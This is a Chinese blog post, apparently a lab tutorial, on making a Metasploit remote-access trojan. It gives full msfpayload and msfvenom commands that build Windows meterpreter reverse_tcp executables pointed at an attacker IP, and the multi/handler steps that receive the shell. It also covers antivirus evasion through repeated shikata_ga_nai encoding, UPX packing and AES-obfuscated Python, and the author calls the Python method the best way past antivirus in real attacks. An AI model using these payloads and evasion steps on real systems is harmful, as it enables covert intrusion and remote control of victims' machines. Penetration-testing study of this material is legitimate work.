Metasploit之我的远程控制软件

  • A+
所属分类:颓废's Blog

Metasploit之我的远程控制软件
参考文献:http://www.evil0x.com/posts/838.html(Metasploit 渗透测试笔记(Meterpreter篇))

远程控制软件-->远控后门木马程序

木马程序-->控制端(攻击者)-->服务端(攻击目标)

测试环境:
攻击者:kali-linux    -->192.168.2.146
受害者:Windows07     -->192.168.2.107

------------------------------------------------------------------------------------------------
(一)以下为kali-linux-1.0系统下的生成与连接方式(使用msfpayload命令的)
参考文献:http://jingyan.baidu.com/article/6b97984dbee2881ca2b0bf33.html
免杀Payload生成:https://my.oschina.net/u/1585857/blog/500183

首先在我们的kali-linux下生成一个木马程序,需要设置连接我们的IP和端口

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe

命令解释:
msfpayload                          -->生成木马/文件的命令
windows/meterpreter/reverse_tcp    -->(生成)这样的一个木马程序
LHOST=192.168.2.146                -->设置本地IP地址
LPORT=44444                        -->设置本地端口
X                                  -->选用二进制方式
>                                  -->写入,举例:echo 1>test.txt(将“1”写入文本)
test.exe                           -->生成的木马程序名字

这样生成的木马文件在当前系统目录下test.exe

之后在metasploit下连接后门程序,步骤如下:

msfconsole-->开启metasploit

use exploit/multi/handler  -->使用“exploit/multi/handler”这个模块连接后门程序

show options   -->查看需要设置的配置信息//这里其实不需要配置任何信息的

set PAYLOAD windows/meterpreter/reverse_tcp    -->使用tcp反向连接

show options  -->查看需要设置的配置信息

set LHOST=192.168.2.146    -->设置我们攻击者自己的连接IP

set LPORT=44444            -->设置我们攻击浙自己的连接端口

exploit                    -->执行连接,等待木马执行后连接

PS:连接成功后可以直接“shell”命令拿下shell

------------------------------------------------------------------------------------------------
(二)以下为kali-linux-2.0系统下的生成与连接方式(使用msfvenom命令的)
参考文献:http://www.77169.com/hack/201602/224112.shtm
类似文献:http://www.i0day.com/1173.html

msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe

以上就是基本命令,解释一下,-p后面是payload名称,然后是你的ip和端口(payload参数),然后是-f 格式,由于是实验就先设置exe,然后-o payload.exe指保存为payload.exe。当然,实验的时候可以把格式设置成exe,但是实战的时候毕竟有杀毒软件,所以格式最好是jar(要求对方有java环境,可以用来拿java web网站的时候使用),或者设置成python然后自行shellcode免杀(用Python容器),然后用AES混淆Python代码,再用pyinstaller编译exe,这是目前最完美的过杀毒软件方案,就连勒索软件都不会被杀毒软件干掉,除非有特殊动作(比如修改注册表)。当然,楼主还有很多要学习。

具体步骤如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 -f exe -o test.exe            -->在当前目录下生成木马程序test.exe,PS:生成payload.exe不会被杀,test.exe被秒杀

PS:之后的操作步骤是和上面的一样的↓

之后在metasploit下连接后门程序,步骤如下:

msfconsole                                     -->开启metasploit

use exploit/multi/handler           -->使用“exploit/multi/handler”这个模块连接后门程序

show options   -->查看需要设置的配置信息//这里其实不需要配置任何信息的

set PAYLOAD windows/meterpreter/reverse_tcp    -->使用tcp反向连接

show options               -->查看需要设置的配置信息

set LHOST=192.168.2.146    -->设置我们攻击者自己的连接IP

set LPORT=44444            -->设置我们攻击浙自己的连接端口

exploit                    -->执行连接,等待木马执行后连接

PS:连接成功后可以直接“shell”命令拿下shell

------------------------------------------------------------------------------------------------
(三)在BT5系统下的生成与连接方式(使用msfvenom命令的)
参考文献:http://www.i0day.com/1173.html

PS:没有环境,不做测试。
因为BT5下也是运用msfvenom命令,所以和kali-linux-2.0的步骤是一样的,区别就是使用模块不一样

以下是文章复制文本

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘/x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳:upx -5 /root/Desktop/acn.exe

结果:

说明:  -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf > use exploit/multi/handler

Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: